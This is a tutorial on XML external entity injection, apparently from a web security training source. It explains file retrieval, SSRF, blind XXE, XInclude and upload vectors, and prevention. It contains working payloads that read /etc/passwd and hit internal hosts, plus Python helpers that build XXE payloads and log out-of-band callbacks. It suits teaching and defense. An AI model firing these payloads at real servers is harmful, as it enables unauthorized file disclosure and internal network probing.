XML external entity (XXE) injection

Context

XML external entity (XXE) injection is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows the attacker to view files on the application server's file system and to interact with any backend or external systems that the application itself can reach. In some situations, an attacker can escalate an XXE attack to compromise the underlying server or other backend infrastructure by leveraging the vulnerability to perform server-side request forgery (SSRF) attacks.

Certain applications employ the XML format for exchanging data between the server and browser, using standard libraries or platform APIs to process the XML data on the server. XXE vulnerabilities arise due to potentially hazardous features in the XML specification, which are supported by standard parsers even if the application does not normally use them.

XML external entities are a type of custom XML entity whose defined values are loaded from outside the DTD in which they are declared. External entities are particularly interesting from a security perspective because they allow an entity to be defined based on the contents of a file path or URL.

There are different kinds of XXE attacks, including exploiting XXE to retrieve files, where an external entity containing the file contents is defined and returned in the application response. Similarly, exploiting XXE to execute SSRF attacks involves defining an external entity based on a URL to a backend system. Blind XXE can be exploited for out-of-band data exfiltration, whereby sensitive data is transmitted from the application server to an attacker-controlled system. Finally, blind XXE can be leveraged to retrieve data via error messages by triggering a parsing error message containing confidential data.

Exploiting XXE to retrieve files

To conduct an XXE injection attack that obtains an arbitrary file from the server's file system, two modifications are required to the submitted XML:

1. Insert (or modify) a DOCTYPE element that defines an external entity containing the path to the file.
2. Modify a data value in the XML that is returned in the application's response, so that it uses the defined external entity.

For instance, suppose that an e-commerce application checks a product's stock level by submitting the following XML to the server:

<?xml version="1.0" encoding="UTF-8"?>
<stockCheck><productId>08</productId></stockCheck>

As the application lacks any specific defenses against XXE attacks, it is possible to exploit the XXE vulnerability to retrieve the file /etc/passwd by submitting the following XXE payload:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>

The given XXE payload creates an external entity, &xxe;, with the contents of the file /etc/passwd as its value and uses the entity in the productId value. Consequently, the response from the application contains the contents of the file:

Invalid product ID: root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
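For authorized testing, the two modifications described above can be scripted. The following is a minimal Python sketch, not a definitive tool: the function name `build_file_xxe_payload` and its parameters are illustrative assumptions, and it relies on simple string matching, so it assumes the target element appears once and has no attributes.

```python
import re


def build_file_xxe_payload(xml_body: str, element: str, system_uri: str) -> str:
    """Apply the two XXE modifications to a request body (hypothetical helper)."""
    # Modification 1: a DOCTYPE that declares an external entity named "xxe".
    doctype = f'<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "{system_uri}"> ]>'

    # Modification 2: replace the element's value with a reference to the entity.
    tag = re.escape(element)
    pattern = re.compile(rf"(<{tag}>).*?(</{tag}>)", re.S)
    modified, count = pattern.subn(
        lambda m: f"{m.group(1)}&xxe;{m.group(2)}", xml_body, count=1
    )
    if count == 0:
        raise ValueError(f"element <{element}> not found in request body")

    # The DOCTYPE must follow the XML declaration when one is present.
    decl = re.match(r"\s*<\?xml[^>]*\?>\s*", modified)
    if decl:
        return modified[: decl.end()] + doctype + "\n" + modified[decl.end():]
    return doctype + "\n" + modified


original = (
    '<?xml version="1.0" encoding="UTF-8"?>\n'
    "<stockCheck><productId>08</productId></stockCheck>"
)
print(build_file_xxe_payload(original, "productId", "file:///etc/passwd"))
```

Given the stock check request shown earlier, this produces the same three-line payload as the example above.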

Exploiting XXE to perform SSRF attacks

Aside from retrieving sensitive data, the other main impact of XXE attacks is that they can be used to perform server-side request forgery (SSRF). This can be severe, because the server-side application can be induced to make HTTP requests to any URL that the server can reach. To exploit an XXE vulnerability for SSRF, define an external XML entity using the target URL and use that entity within a data value. If the data value is returned in the application's response, you can view the response from the URL there and so gain two-way interaction with the backend system. Otherwise, only blind SSRF attacks are possible, which can still have critical consequences.

In the following XXE example, the external entity causes the server to make a backend HTTP request to an internal system within the organization's infrastructure:

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://internal.website.com/"> ]>
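To see which resources a document would ask a parser to fetch, without fetching anything, you can list its external entity declarations. The sketch below uses Python's standard `xml.parsers.expat` module, which reports entity declarations but does not retrieve external entities unless a handler is installed to do so. The helper name `list_external_entities` and the surrounding `<foo>` document are assumptions made for illustration.

```python
from xml.parsers import expat


def list_external_entities(document: str):
    """Return (name, system_id) for each external entity declared in the DTD."""
    found = []

    def on_entity_decl(name, is_parameter, value, base, system_id, public_id, notation):
        # Internal entities carry a literal value; external entities carry a
        # system identifier (a file path or URL) instead.
        if system_id is not None:
            found.append((name, system_id))

    parser = expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl
    parser.Parse(document, True)  # True marks this as the final chunk of input
    return found


doc = (
    '<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://internal.website.com/"> ]>'
    "<foo>&xxe;</foo>"
)
print(list_external_entities(doc))
```

A check like this can help when reviewing logged requests or test payloads: any `http://` or `file://` system identifier in the result is a location the server would be induced to read if its parser resolved external entities.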

Blind XXE vulnerabilities

Many XXE vulnerabilities are "blind," meaning that the application does not return the values of any defined external entities in its responses, so direct retrieval of server-side files is not possible.

Despite this, blind XXE vulnerabilities can still be identified and exploited, but more sophisticated techniques are necessary. Out-of-band techniques can occasionally be employed to uncover and exploit vulnerabilities to extract data. Moreover, XML parsing errors can sometimes be triggered, which result in the exposure of sensitive data in error messages.

Finding a hidden attack surface for XXE injection

The attack surface of XXE injection vulnerabilities is often apparent because the routine HTTP traffic of the application includes requests containing data in XML format. However, in some instances, the attack surface is less conspicuous. Nevertheless, with the correct approach, an XXE attack surface can be located in requests that do not contain any XML.

XInclude attacks

Certain applications accept data from clients, integrate it server-side into an XML document, and then parse the document. For example, this occurs when client-submitted data is included in a backend SOAP request that the backend SOAP service then processes.

In such cases, a classic XXE attack is not feasible because you do not control the entire XML document and therefore cannot define or modify a DOCTYPE element. However, you may be able to use XInclude instead. XInclude is a W3C specification, a companion to XML, that allows an XML document to be built from sub-documents. Because an XInclude directive can be placed in any data value in an XML document, the attack works even when you control only a single item of data that is placed into a server-side XML document. To perform an XInclude attack, reference the XInclude namespace and provide the path to the file you want to include, for example:

<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>
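The mechanism can be reproduced safely with Python's standard library. This is a sketch under stated assumptions: `build_backend_document` stands in for a hypothetical backend that concatenates client data into XML, and `fake_loader` replaces the real file system with an in-memory dictionary so nothing is actually read from disk. Note that `xml.etree.ElementTree` expands XInclude only when the application calls `ElementInclude.include` explicitly.

```python
import xml.etree.ElementTree as ET
from xml.etree import ElementInclude

# Hypothetical stand-in for the server's file system, so the demo reads nothing real.
FAKE_FILES = {"file:///etc/passwd": "root:x:0:0:root:/root:/bin/bash\n"}


def fake_loader(href, parse, encoding=None):
    """Loader with the signature ElementInclude expects; None means 'not found'."""
    return FAKE_FILES.get(href)


def build_backend_document(product_id: str) -> str:
    # Vulnerable pattern: client data is concatenated into XML without escaping.
    return f"<stockCheck><productId>{product_id}</productId></stockCheck>"


def process(product_id: str) -> ET.Element:
    root = ET.fromstring(build_backend_document(product_id))
    # XInclude directives are expanded only because the application asks for it.
    ElementInclude.include(root, loader=fake_loader)
    return root


payload = (
    '<foo xmlns:xi="http://www.w3.org/2001/XInclude">'
    '<xi:include parse="text" href="file:///etc/passwd"/></foo>'
)
root = process(payload)
print(root.find("productId/foo").text)
```

The attacker controls only the `productId` value, yet the included text ends up inside the parsed document. Escaping the client data before embedding it, or not enabling XInclude processing at all, would stop this particular path.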

XXE attacks via file upload

Some applications allow users to upload files that are then processed server-side. Some common file formats are XML-based or contain XML subcomponents, including office document formats such as DOCX and image formats such as SVG.

Consider an example in which an application allows users to upload images and then performs processing or validation on the server after upload. Even if the application anticipates receiving an image format such as PNG or JPEG, the image processing library it uses may also support SVG images. As the SVG format is XML-based, an attacker can upload a malicious SVG image and access a hidden attack surface for XXE vulnerabilities.
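One defensive idea that follows from this is to classify uploads by their leading bytes rather than by file name or declared type, and to reject anything that is not an expected format before it reaches an image library. The following is a rough sketch only: the function name `sniff_upload` is an assumption, and the check is deliberately simple (it would not, for example, recognize XML encoded as UTF-16).

```python
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
JPEG_MAGIC = b"\xff\xd8\xff"


def sniff_upload(data: bytes) -> str:
    """Classify an upload by its leading bytes (hypothetical helper)."""
    if data.startswith(PNG_MAGIC):
        return "png"
    if data.startswith(JPEG_MAGIC):
        return "jpeg"
    # Skip a UTF-8 byte order mark and leading whitespace, then look for XML markers.
    head = data.lstrip(b"\xef\xbb\xbf \t\r\n")[:64].lower()
    if head.startswith((b"<?xml", b"<!doctype", b"<svg")):
        return "xml"
    return "unknown"


def is_allowed_image(data: bytes) -> bool:
    # Accept only the formats the application actually expects.
    return sniff_upload(data) in {"png", "jpeg"}


svg = b'<?xml version="1.0"?><svg xmlns="http://www.w3.org/2000/svg"/>'
print(sniff_upload(svg), is_allowed_image(svg))
```

An upload named `avatar.png` that contains SVG markup is classified as `xml` here and rejected, so it never reaches an XML parser inside the image processing library.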

XXE attacks via modified content type

Most POST requests use a default content type generated by HTML forms, application/x-www-form-urlencoded. Some websites expect requests in this format but will tolerate other content types, including XML. For example, suppose a normal request contains the following:

POST /action HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 7

foo=bar

You might then be able to submit the following request and obtain the same result:

POST /action HTTP/1.0
Content-Type: text/xml
Content-Length: 52

<?xml version="1.0" encoding="UTF-8"?><foo>bar</foo>

If the application tolerates requests that contain XML in the message body and parses the body as XML, you can reach this hidden XXE attack surface simply by reformatting requests to use XML.
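The reformatting step can be automated when testing many endpoints. Below is a minimal sketch that converts a single form field into the equivalent XML body and recomputes Content-Length. The function names are illustrative assumptions, and the sketch assumes the field name is also a valid XML element name.

```python
from urllib.parse import parse_qsl
from xml.sax.saxutils import escape

XML_DECL = '<?xml version="1.0" encoding="UTF-8"?>'


def form_body_to_xml(form_body: str) -> str:
    """Convert a one-field form body such as 'foo=bar' into an XML body."""
    pairs = parse_qsl(form_body, keep_blank_values=True)
    if len(pairs) != 1:
        raise ValueError("this sketch only handles a single name=value pair")
    name, value = pairs[0]
    # Escape &, < and > so the value stays plain character data.
    return f"{XML_DECL}<{name}>{escape(value)}</{name}>"


def build_xml_request(path: str, form_body: str) -> str:
    """Build the raw HTTP request text with an XML content type."""
    body = form_body_to_xml(form_body)
    length = len(body.encode("utf-8"))  # Content-Length counts bytes, not characters
    return (
        f"POST {path} HTTP/1.0\r\n"
        "Content-Type: text/xml\r\n"
        f"Content-Length: {length}\r\n"
        "\r\n"
        f"{body}"
    )


print(build_xml_request("/action", "foo=bar"))
```

For the `foo=bar` example this reproduces the XML request shown above, including its Content-Length of 52.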

How to find and test for XXE vulnerabilities

Manually testing for XXE vulnerabilities generally involves three checks. First, test for file retrieval by defining an external entity based on a well-known operating system file and using that entity in data that is returned in the application's response. Second, test for blind XXE vulnerabilities by defining an external entity based on a URL to a system that you control, and monitoring for interactions with that system. Third, test for vulnerable inclusion of user-supplied non-XML data in a server-side XML document by using an XInclude attack to try to retrieve a well-known operating system file.
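For the blind XXE check, the "monitoring" side can be as simple as a small HTTP listener on a system you control that records every request it receives. The following sketch uses only Python's standard library. The class and function names are assumptions, it binds to 127.0.0.1 for demonstration, and a real test would need an address that the target server can reach and that you are authorized to use.

```python
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


class InteractionLogger(BaseHTTPRequestHandler):
    """Records each incoming GET so that blind interactions become visible."""

    seen = []  # shared log of (client_ip, path) tuples

    def do_GET(self):
        InteractionLogger.seen.append((self.client_address[0], self.path))
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, format, *args):
        pass  # keep the console quiet; interactions are stored in `seen`


def start_listener(host: str = "127.0.0.1", port: int = 0) -> HTTPServer:
    """Start the listener in a background thread; port 0 picks a free port."""
    server = HTTPServer((host, port), InteractionLogger)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


if __name__ == "__main__":
    server = start_listener()
    print("listening on port", server.server_address[1])
    input("press Enter to stop and show recorded interactions\n")
    server.shutdown()
    print(InteractionLogger.seen)
```

If an external entity such as `http://<your-host>:<port>/xxe-probe` is submitted and an entry for `/xxe-probe` appears in the log, the parser resolved the entity even though nothing was reflected in the response.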

How to prevent XXE vulnerabilities

XXE vulnerabilities occur because an application's XML parsing library supports potentially harmful XML features that the application does not require or intend to use. Disabling these features is the most straightforward and efficient way to prevent XXE attacks. Disabling external entity resolution and XInclude support is usually sufficient and can be accomplished through configuration options or programmatic overrides of default behavior. Check the documentation of your XML parsing library or API for guidance on disabling unnecessary features.
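As one illustration of a programmatic override, an application that never needs DTDs can refuse any document that contains a DOCTYPE declaration before parsing it. The sketch below does this in Python with the standard `xml.parsers.expat` module. The names `DoctypeForbidden` and `parse_untrusted_xml` are assumptions, and other languages and libraries expose different options, so treat this as one possible approach rather than the recommended configuration for your parser.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when an untrusted XML document contains a DOCTYPE declaration."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")


def parse_untrusted_xml(data: bytes) -> ET.Element:
    """Parse XML only if it declares no DTD (and therefore no entities)."""
    # First pass: walk the document with expat and abort at the first DOCTYPE.
    # Malformed input raises expat.ExpatError here.
    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = _reject_doctype
    checker.Parse(data, True)
    # Second pass: the document is DTD-free, so build the tree as usual.
    return ET.fromstring(data)


safe = b'<?xml version="1.0" encoding="UTF-8"?><stockCheck><productId>08</productId></stockCheck>'
print(parse_untrusted_xml(safe).find("productId").text)
```

Rejecting the DOCTYPE outright is stricter than disabling external entity resolution alone, which suits applications that have no legitimate use for DTDs. In this Python setup XInclude is not a concern unless the code explicitly calls `xml.etree.ElementInclude.include`.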